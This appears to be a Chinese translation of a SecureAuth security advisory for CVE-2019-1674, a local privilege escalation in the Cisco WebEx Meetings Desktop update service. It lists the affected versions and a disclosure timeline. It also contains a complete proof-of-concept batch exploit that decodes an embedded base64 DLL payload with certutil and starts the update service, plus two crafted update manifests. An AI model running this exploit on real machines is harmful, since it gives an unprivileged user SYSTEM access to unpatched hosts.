Cisco WebEx会议系统本地权限提升漏洞分析(CVE-2019-1674)

41yf1sh 漏洞 2019年3月7日发布
Favorite收藏

导语:在Cisco WebEx Meeting桌面版本的更新服务中存在一个漏洞,导致Windows版本的应用程序可以允许本地攻击者实现权限提升。

概述

Cisco的WebEx会议系统是一个视频会议和在线会议的平台,支持清晰的音频和视频沟通,同时能够轻松实现屏幕共享。根据其官方的介绍,这个平台“能帮助用户忘记技术,专注于最重要的事情”。在Cisco WebEx Meeting桌面版本的更新服务中存在一个漏洞,导致Windows版本的应用程序可以允许本地攻击者实现权限提升。

受漏洞影响版本

· Cisco Webex Meetings Desktop App v33.6.4.15

· Cisco Webex Meetings Desktop App v33.6.5.2

· Cisco Webex Meetings Desktop App v33.7.0.694

· Cisco Webex Meetings Desktop App v33.7.1.15

· Cisco Webex Meetings Desktop App v33.7.2.24

· Cisco Webex Meetings Desktop App v33.7.3.7

· Cisco Webex Meetings Desktop App v33.8.0.779

· Cisco Webex Meetings Desktop App v33.8.1.13

· Cisco Webex Meetings Desktop App v33.8.2.7

旧版本可能同样受到该漏洞的影响,但目前未对旧版本进行过检查。

漏洞详情

Cisco Webex Meetings桌面应用程序(Windows版本)的更新服务无法正确验证新文件的版本号。不具有特权的本地攻击者可以通过使用精心设计的参数和文件夹调用更新服务命令来利用此漏洞。这将允许攻击者使用SYSTEM用户权限运行任意命令。

要利用此漏洞,攻击者必须首先将atgpcdec.7z复制到一个本地攻击者控制(Controller)文件夹中,然后将其重命名为atgpcdec.7z。随后,攻击者需要将先前版本的ptUpdate.exe文件压缩成7z文件并复制到控制文件夹中。与此同时,恶意DLL文件也必须放在同一个文件夹中,其名称为vcruntime140.dll,需要压缩为vcruntime140.7z。最后,还应在控制文件夹中为更新的二进制文件(ptUpdate.exe)提供ptUpdate.xml文件,从而使应用程序将我们的文件视为一个正常的更新。

要获取权限,攻击者必须使用命令行启动服务:

sc start webexservice WebexService 1 989898 "attacker-controlled-path"

概念证明

下面的概念证明将执行两步攻击,因为从33.8.x版本开始,应用程序会强制检查所有下载的二进制文件的签名。这两步攻击适用于所有提到的易受攻击的软件包。需要注意的是,在进行概念证明的过程中,还需要以前版本的ptUpdate.exe可执行文件。在第一步中,需要3307.1.1811.1500;在第二步中,需要3306.4.1811.1600。如果目标版本低于33.8.x,那么实际只需要进行第二步。

批处理文件如下:

/-----
 @echo off
 REM Contents of PoC.bat
 REM
 REM This batch file will exploit CVE-2019-1674
 REM
 REM First, it will copy the atgpcdec.dll file from the installation
 REM folder to the current folder as atgpcdec.7z. Then, it will backup
 REM ptUpdate.exe and vcruntime140.dll files from the installation folder
 REM in the current folder, adding .bak to their names. Keep in mind that
 REM those files will be replaced (especially, vcruntime140.dll) and if
 REM not restored, will render the application useless.
 REM
 REM The executable ptUpdate.exe version 3307.1.1811.1500 must be
 REM compressed as ptUpdate0.7z and present in the current folder.
 REM The executable ptUpdate.exe version 3306.4.1811.1600 must be
 REM compressed as ptUpdate1.7z and present in the current folder.
 REM Both can be generated using 7zip GUI and compressing as 7z, with
 REM normal compression level and LZMA compression method.
 REM Another way is to compress both files using the command line app:
 REM
 REM 7z.exe a ptUpdate0.7z ptUpdate.exe -m0=BCJ -m1=LZMA:d=21
 REM
 REM ptUpdate0.xml file will be used in the first stage of the attack. It
 REM will be renamed to ptUpdate.xml. Make sure to check and adjust (if
 REM necessary) the "Size" and "PackagedSize" values of the xml, to the
 REM ptUpdate0.7z ones. ptUpdate0.7z will be renamed to ptUpdate.7z. Then
 REM the update service will be started.
 REM
 REM The batch will wait until the process (ptUpdate.exe) finishes
 REM
 REM After the first stage is completeted, it will rename ptUpdate.7z
 REM back to ptUpdate0.7z, and ptUpdate.xml to ptUpdate0.xml.
 REM
 REM Now, ptUpdate1.xml file will be used in the second stage of the
 REM attack. It will be renamed to ptUpdate.xml. Also, ptUpdate1.7z will
 REM be renamed to ptUpdate.7z. Remember to check and adjust (if
 REM necessary) the "Size" and "PackagedSize" values of the xml, to the
 REM ptUpdate1.7z ones. Out "malicious" DLL will be generated using
 REM certutil.exe and named vcruntime140.7z. It's a simple dll that will
 REM execute notepad.exe on load and that has the same exported functions
 REM as the original. The update service will be started again.
 REM
 REM The batch will wait until the process (ptUpdate.exe) finishes
 REM
 REM Once finished, it will print that the attack is done and wait for a
 REM key press. You should see a notepad.exe (2, in fact) with SYSTEM
 REM user privileges running.
 REM
 REM After a key is pressed, the batch will finish removing atgpcdec.7z
 REM and vcruntime140.7z. Also it will rename ptUpdate.7z back to
 REM ptUpdate1.7z, and ptUpdate.xml to ptUpdate1.xml.
 
 
 :CheckOS
 IF EXIST "%PROGRAMFILES(X86)%" (GOTO 64BIT) ELSE (GOTO 32BIT)
 
 :64BIT
 copy "%PROGRAMFILES(X86)%\Webex\Webex\Applications\atgpcdec.dll" atgpcdec.7z
 copy "%PROGRAMFILES(X86)%\Webex\Webex\Applications\ptUpdate.exe"
 ptUpdate.exe.bak
 copy "%PROGRAMFILES(X86)%\Webex\Webex\Applications\vcruntime140.dll"
 vcruntime140.dll.bak
 GOTO END
 
 :32BIT
 copy "%PROGRAMFILES%\Webex\Webex\Applications\atgpcdec.dll" atgpcdec.7z
 copy "%PROGRAMFILES%\Webex\Webex\Applications\ptUpdate.exe" ptUpdate.exe.bak
 copy "%PROGRAMFILES%\Webex\Webex\Applications\vcruntime140.dll"
 vcruntime140.dll.bak
 GOTO END
 
 :END
 
 ren ptUpdate0.xml ptUpdate.xml
 ren ptUpdate0.7z ptUpdate.7z
 SET mypath=%~dp0
 sc start webexservice WebexService 1 989898 %mypath:~0,-1%
 
 ECHO Waiting 3 seconds until ptUpdate.exe starts
 Timeout /T 3 /Nobreak
 
 :LOOP1
 tasklist | find /i "ptUpdate" >nul 2>&1
 IF ERRORLEVEL 1 (
   GOTO CONTINUE1
 ) ELSE (
   ECHO ptUpdate.exe is still running
   Timeout /T 1 /Nobreak
   GOTO LOOP1
 )
 
 :CONTINUE1
 
 ren ptUpdate.xml ptUpdate0.xml
 ren ptUpdate.7z ptUpdate0.7z
 ren ptUpdate1.xml ptUpdate.xml
 ren ptUpdate1.7z ptUpdate.7z
 
 echo
 N3q8ryccAARIz/fVRwYAAAAAAAB6AAAAAAAAANcfWYEAJpaOcAAX9+wFu+r0/5QBL0TuTr0Jkm3dgTnz3Weoe6NfFfEa/Y28zsBB2HEdPWzlugty+IIM4hglhy/h80OeyYw5CMe7jUK77wLPQMC9wwpT+oLYVDSuOK/v2WNuOLCpU3qtGSO+2sIFpGixpKQvLykpGOZUMczuRNNr/8Ps1lApsqe0ERm7gPGyiMqJBOCOVTC85lKIa2Cmc
 > dll.txt
 echo
 scrjgqKPPNmbXvscJWxmvv4NtC3mLQ1KuXYBSZXmFp8dR+ZDy5znkGG/C3w0T76c4wRCfOk+/myji9luDzO2OOwp8wgpN1QeGsA4+kaZwKYTisIvPegsI2joDsLAomIh2ToXENtcOA9/11kkJy4ColEdqlXxwSW2u45ajuNDs0aAE9nbz4AWXtv/VPfc4fn3Q+mN7FTmaDUr8dxZ5V05IafOO2qTgdSHPemTasMSqYLbzA8iaxBZimokw
 >> dll.txt
 echo
 zyzr3fwZIci+Ewzq5BnNXk+lvA30xCUYdvQuMCGkxBozk9Ec0kQ/SUixz77Nc9SbJnm0Hncff3QRRlU9ciqc6cYkQ2Cm+/dWkyDgJU+sxT9VGV+WVwNK85Q6zpPWLeVRYtk9UkxKHF0aXf3l/OgfQqtz0WSR94AF+Z9AiblDy0zOreSW8PhFbu0hfAgY1pMNC5gPNJiJ3OGwT/cLEhBPusvpfcLP3V0BwXx04T+5R7d5Rw9xWExdfCzGb
 >> dll.txt
 echo
 Mgyijdf5nP7fv9e5V0KO8kKrGVofstVIN8FTQSMeRGYRdv9WyuLRFWbArCL86HMo5NYEwFinlqCGqnY8hZcDMPe89q1xoNlVDmDtLC+AZqEkPKuqStllzKH7qQDg7Ahe6AMtGjaT2NptL2bSBYlkfn+1iiMt5cC/inZAoZoreSpDbGb4HRcOVce7ZKeiBAFpEzM0bEXAxnbLNO0pHm0bYCftbOkffJap3m79V+Dj4t0NPgwbhYKUqk1Hi
 >> dll.txt
 echo
 /9ebVE+IIsUlFFggilCy7BmIh3MF3Gmuhr7QLK37zV72LA0/tuDXXTWP/0EJEQ3F/v1+hSj/+HMwUBFL8xsghBfOXTpmBG6cUxK2YOwXvs/ntja2a7SWwppxtWgr4n/pxEdeezoBGl1sTZ9aIwSlu1mMehS5RYoyiSKnQfgLMsIYLqjZtc2DjUdSZDutZgC91axMjIEQ8kDIBp8dbuX4MpzNYe65OrKG/u76aemvcQ/R1QAwgTopuWgqO
 >> dll.txt
 echo
 tJ7LIkRv406u+Qs2d5KA9+IplFV7ZL9w1zXTDTFqATROK0IKtY2MPaP5Ia0d0UFizj0I7OZSeDtZXPohMxi01xMLyqCXIQ4vaJGVneNi1SyxAJ2hV92+5sxBCOlQ+d4w19k6iJA/siz1+V0FnIrN6csCMaW6yBnR6H+jHpm2sqXf3xyU8UkCRx09LmD1lcSB3sWdc3AnoG2ijb7lD6eBdCH2OlMWceeAfOMRm48MfYW6+AcZJm9wEQ9p8
 >> dll.txt
 echo
 irxwCQuETvGMphqzbPxFJXErhoMTxlE57+/ZLBt8F/3XAaxQnmMucvSCFMYc6Z76OCbeotPfVnPhqL+torsEaph6DFzcw3dWuFrekbLnVVFKmM/QyeZVLS18u5lY1tGRyfAUCyhPIPJvUcXFKuDYHmdT/bOnF1B/xexvtY8boRhcKiNg4JBluTMbamdoktvfWvIVGUz2m50yA0dNN06yebHietxA+IwM0zfNbqpNWJjOItsi6/27j1mE7
 >> dll.txt
 echo
 WCgPS5tetN44WkYD28Bm+LmHwz4lbPVjAIcgZBv0OtAXJsWMUtN8Bc2z9+fVSqc7pCHGCRnYDyKm8QhcV8hU4I/M4hSN+BWYn2jGJqc42lcaMzfXrySCnF4dAtIiE1HzAwmwWAqjlVkZdFiIuQ1m+pdbx2Ipji5piYRAJtykwO0H5JThzAzJGObOMCAenaKgvgtwF97iFdBZHxuSz+3DcYF6gQupm/BxNd35l6qj19sN2qixeGJ7rQapV
 >> dll.txt
 echo
 DJLTM5KMPdSItBNJSLLp9fuObcufi/6MBif28vemivzaWtalocJxX/MJni8PfdLYn/rLJQXmpq4Qm7z6N7FlPLtelATkMAZZ2ofaLFeBvIKzymBqtsxQAb63b+MowQvOkGAesT5JNXhoRqzOoATB9I/O7xIZu30SZwWdW85DX2MNAeB/DgzLt/c7U9A2D5vIgAEEBgABCYZHAAcLAQACIwMBAQVdABgAAAQDAwEDAQAMmACYAAAICgGcR
 >> dll.txt
 echo
 dWGAAAFARkLAAAAAAAAAAAAAAARIwB2AGMAcgB1AG4AdABpAG0AZQAxADQAMAAuAGQAbABsAAAAGQAUCgEAkBJyInaL1AEVBgEAIAAAAAAA
 >> dll.txt
 
 certutil -decode dll.txt vcruntime140.7z
 
 del dll.txt
 
 SET mypath=%~dp0
 sc start webexservice WebexService 1 989898 %mypath:~0,-1%
 
 ECHO Waiting 3 seconds until ptUpdate.exe starts
 Timeout /T 3 /Nobreak
 
 :LOOP2
 tasklist | find /i "ptUpdate" >nul 2>&1
 IF ERRORLEVEL 1 (
   GOTO CONTINUE2
 ) ELSE (
   ECHO ptUpdate.exe is still running
   Timeout /T 1 /Nobreak
   GOTO LOOP2
 )
 
 :CONTINUE2
 
 ECHO Attack done!
 pause
 
 ren ptUpdate.xml ptUpdate1.xml
 ren ptUpdate.7z ptUpdate1.7z
 del atgpcdec.7z
 del vcruntime140.7z
 -----/

ptUpdate0.xml文件如下:

/-----
 <?xml version="1.0"?>
 <serv:message xmlns:serv="http://www.webex.com/schemas/2002/06/service"
 xmlns:com="http://www.webex.com/schemas/2002/06/common"
 xmlns:use="http://www.webex.com/schemas/2002/06/service/user">
     <serv:header></serv:header>
     <serv:body>
         <serv:bodyContent xsi:type="use:getUpdateResponse"
 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
             <UpdateVersionNumber>33.8.3</UpdateVersionNumber>
             <BuildNumber>33.8.3-24</BuildNumber>
             <ExternalVersionNumber>33.8.3.24</ExternalVersionNumber>
             <GPCINI>self/gpc.php</GPCINI>
             <ReleaseDate>February 2017</ReleaseDate>
             <Description>WebEx Productivity Tools 33.8.3</Description>
             <MsiLocation>msi/ptools.msi</MsiLocation>
             <UpdateFormat>binary</UpdateFormat>
             <ReleaseTrain>T32</ReleaseTrain>
             <Location>$dummy/upgradeserver/client/ptool/33.8.3</Location>
             <ControlOption>0</ControlOption>
             <WBSVERSION>33</WBSVERSION>
             <Server>myCompany.webex.com</Server>
             <UserName>[email protected]</UserName>
             <DownloadSize>22496333</DownloadSize>
             <VersionURL/>
             <FileInfo>
                 <SectionName>Installation</SectionName>
                 <PackedName>ptupdate.7z</PackedName>
                 <PackedNameL10N>ptupdate.7z</PackedNameL10N>
                 <OrigianlName>ptupdate.exe</OrigianlName>
                 <Version>3307,1,1811,1500</Version>
                 <Size>1985592</Size>
                 <PackagedSize>610752</PackagedSize>
                 <CheckMethod>1</CheckMethod>
                 <CouldIgnore>1</CouldIgnore>
                 <NeedDownLoad>1</NeedDownLoad>
             </FileInfo>
             <Tools>
                 <UseEmailType/>
                 <Outlook>0</Outlook>
                 <Notes>0</Notes>
                 <UseWebExWithOffice>1</UseWebExWithOffice>
                 <Excel>0</Excel>
                 <PowerPoint>0</PowerPoint>
                 <Word>0</Word>
                 <IEShortCut>1</IEShortCut>
                 <IERightMenu>0</IERightMenu>
                 <UseWebExWithIM>1</UseWebExWithIM>
                 <AOL>0</AOL>
                 <Sametime>0</Sametime>
                 <WindowsMessenger>0</WindowsMessenger>
                 <Yahoo>0</Yahoo>
                 <Skype>0</Skype>
                 <GoogleTalk>0</GoogleTalk>
                 <Firefox/>
                 <IPPhone>1</IPPhone>
             </Tools>
         </serv:bodyContent>
     </serv:body>
 </serv:message>
 -----/

ptUpdate1.xml文件如下:

/-----
 <?xml version="1.0"?>
 <serv:message xmlns:serv="http://www.webex.com/schemas/2002/06/service"
 xmlns:com="http://www.webex.com/schemas/2002/06/common"
 xmlns:use="http://www.webex.com/schemas/2002/06/service/user">
     <serv:header>                                                       
     </serv:header>
     <serv:body>
         <serv:bodyContent xsi:type="use:getUpdateResponse"
 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
             <UpdateVersionNumber>33.8.4</UpdateVersionNumber>
             <BuildNumber>33.8.4-24</BuildNumber>
             <ExternalVersionNumber>33.8.4.24</ExternalVersionNumber>
             <GPCINI>self/gpc.php</GPCINI>
             <ReleaseDate>February 2017</ReleaseDate>
             <Description>WebEx Productivity Tools 33.8.4</Description>
             <MsiLocation>msi/ptools.msi</MsiLocation>
             <UpdateFormat>binary</UpdateFormat>
             <ReleaseTrain>T32</ReleaseTrain>
             <Location>$dummy/upgradeserver/client/ptool/33.8.4</Location>
             <ControlOption>0</ControlOption>
             <WBSVERSION>33</WBSVERSION>
             <Server>myCompany.webex.com</Server>
             <UserName>[email protected]</UserName>
             <DownloadSize>22496333</DownloadSize>
             <VersionURL/>
             <FileInfo>
                 <SectionName>Common</SectionName>
                 <PackedName>vcruntime140.7z</PackedName>
                 <PackedNameL10N>vcruntime140.7z</PackedNameL10N>
                 <OrigianlName>vcruntime140.dll</OrigianlName>
                 <Version>14,14,26405,0</Version>
                 <Size>6144</Size>
                 <PackagedSize>1761</PackagedSize>
                 <CheckMethod>1</CheckMethod>
                 <CouldIgnore>1</CouldIgnore>
                 <NeedDownLoad>1</NeedDownLoad>
             </FileInfo>
             <FileInfo>
                 <SectionName>Installation</SectionName>
                 <PackedName>ptupdate.7z</PackedName>
                 <PackedNameL10N>ptupdate.7z</PackedNameL10N>
                 <OrigianlName>ptupdate.exe</OrigianlName>
                 <Version>3306,4,1811,1600</Version>
                 <Size>1992760</Size>
                 <PackagedSize>611786</PackagedSize>
                 <CheckMethod>1</CheckMethod>
                 <CouldIgnore>1</CouldIgnore>
                 <NeedDownLoad>1</NeedDownLoad>
             </FileInfo>
             <Tools>
                 <UseEmailType/>
                 <Outlook>0</Outlook>
                 <Notes>0</Notes>
                 <UseWebExWithOffice>1</UseWebExWithOffice>
                 <Excel>0</Excel>
                 <PowerPoint>0</PowerPoint>
                 <Word>0</Word>
                 <IEShortCut>1</IEShortCut>
                 <IERightMenu>0</IERightMenu>
                 <UseWebExWithIM>1</UseWebExWithIM>
                 <AOL>0</AOL>
                 <Sametime>0</Sametime>
                 <WindowsMessenger>0</WindowsMessenger>
                 <Yahoo>0</Yahoo>
                 <Skype>0</Skype>
                 <GoogleTalk>0</GoogleTalk>
                 <Firefox/>
                 <IPPhone>1</IPPhone>
             </Tools>
         </serv:bodyContent>
     </serv:body>
 </serv:message>
 -----/

时间节点

· 2018年12月4日 SecureAuth向Cisco PSIRT发送通知

· 2018年12月5日 Cisco接收漏洞,并告知将进行分析

· 2018年12月7日 Cisco反馈正在针对漏洞制定修复计划

· 2018年12月7日 SecureAuth感谢Cisco更新漏洞进展

· 2018年12月10日 Cisco通知SecureAuth,预计在2月底前发布更新

· 2018年12月10日 SecureAuth感谢Cisco更新漏洞进展

· 2019年1月15日 SecureAuth要求Cisco提供更新

· 2019年1月22日 SecureAuth再次要求Cisco提供更新

· 2019年1月22日 Cisco反馈说将在2月发布修复程序

· 2019年2月11日 Cisco确认2月27日为漏洞披露日期

· 2019年2月27日 发布本文章

厂商回应

Cisco表示该漏洞已经在33.6.6和33.9.1版本的Cisco Webex会议桌面应用中实现修复。此外,Cisco还发布了以下建议:

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-wmda-cmdinj

贡献

此漏洞由SecureAuth的Marcos Accossatto发现并研究。此通报的发布由SecureAuth Advisories Team的Leandro Cuozzo协调。

本文翻译自:https://packetstormsecurity.com/files/151914如若转载,请注明原文地址: https://www.4hou.com/vulnerable/16522.html
点赞 0
  • 分享至
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

发表评论